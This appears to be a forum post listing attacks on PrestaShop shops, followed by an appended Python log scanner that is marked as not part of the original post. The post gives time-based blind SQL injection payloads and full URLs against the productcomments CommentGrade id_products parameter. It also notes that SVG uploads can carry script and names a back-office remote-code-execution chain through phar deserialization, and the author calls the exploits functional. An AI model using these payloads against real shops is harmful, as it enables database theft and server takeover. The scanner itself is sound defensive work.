
Ps 1.7.7.x - 'id_product' SQL Injection


tamu secreto


SQL Injection

Parameter: id_product

Payload: 1 AND (SELECT 4333 FROM (SELECT(SLEEP(5)))xoOt)

example:
 

http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1 AND (SELECT 4333 FROM (SELECT(SLEEP(5)))xoOt)

 

 

ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection

 

http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=[SQL]

 

Example: http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))

 

Cross-Site Request Forgery

The file manager allows the following file types to be uploaded:
jpg, jpeg, png, gif, bmp, tiff, svg, pdf, mov, mpeg, mp4, avi, mpg, wma, flv, webm
An uploaded SVG file can contain JavaScript code.

 

Remote Code Execution

Vulnerable Package Link:

https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip

Apli:  PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x - Back Office Remote Code Execution

Chaining multiple vulnerabilities to trigger deserialization via phar

back-office-url email password func param.

The values were changed; a word to the wise is enough. The exploits are functional!! 🙄

Greetings and good luck! 😇
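
A defender-side check for the requests described in this post, as an added example that is not part of the original post: it flags non-integer `id_product` / `id_products[]` values sent to the productcomments `CommentGrade` controller in logged request targets. The function names and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Keys named in the post: id_product and id_products[] (with or without an index).
ID_KEY = re.compile(r"id_products?(\[[^\]]*\])?")
PLAIN_INT = re.compile(r"[0-9]{1,10}")


def non_integer_ids(request_target):
    """Return (key, value) pairs whose value is not a bare integer.

    Only requests routed to the productcomments CommentGrade controller are
    inspected. parse_qsl percent-decodes keys and values first, so
    id_products%5B%5D and id_products[] are treated the same.
    """
    pairs = parse_qsl(urlsplit(request_target).query, keep_blank_values=True)
    params = dict(pairs)  # last value wins; sufficient for the routing keys
    route = (params.get("module"), params.get("controller"))
    if route != ("productcomments", "CommentGrade"):
        return []
    return [(k, v) for k, v in pairs
            if ID_KEY.fullmatch(k) and not PLAIN_INT.fullmatch(v)]


# Constructed request targets for illustration, not taken from a real log.
SAMPLE_REQUESTS = [
    "/index.php?fc=module&module=productcomments&controller=CommentGrade"
    "&id_products[]=1&id_products[]=27",
    "/index.php?fc=module&module=productcomments&controller=CommentGrade"
    "&id_products%5B%5D=1%20AND%20(SELECT%204333%20FROM%20(SELECT(SLEEP(5)))xoOt)",
    "/index.php?controller=product&id_product=12",
]


def scan(requests):
    """Map each flagged request target to its offending (key, value) pairs."""
    return {r: hits for r in requests if (hits := non_integer_ids(r))}


if __name__ == "__main__":
    for target, hits in scan(SAMPLE_REQUESTS).items():
        print("ALERT", hits, "in", target)
```

The same integer-only rule can be enforced at a WAF or reverse proxy in front of the shop while the module is being updated.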

 

 

 

 

 

 
